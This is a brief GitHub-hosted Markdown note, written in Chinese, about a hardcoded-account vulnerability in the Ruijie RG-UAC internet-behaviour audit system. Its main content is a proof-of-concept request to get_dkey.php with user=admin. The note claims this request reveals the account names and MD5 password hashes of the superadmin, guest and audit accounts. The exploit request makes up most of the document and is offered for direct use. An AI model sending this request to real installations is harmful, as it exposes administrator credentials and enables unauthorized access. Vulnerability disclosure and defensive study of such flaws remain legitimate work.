Skip to content

Latest commit

 

History

History
5 lines (4 loc) · 282 Bytes

锐捷 RG-UAC 统一上网行为管理审计系统 账户硬编码漏洞.md

File metadata and controls

5 lines (4 loc) · 282 Bytes

锐捷 RG-UAC 统一上网行为管理审计系统 账户硬编码漏洞

poc:
https://127.0.0.1/get_dkey.php?user=admin

成功访问后,可看到该系统的超级管理员权限账号、访客权限账号、审计权限账号的 账户名 和 MD5 加密的密码值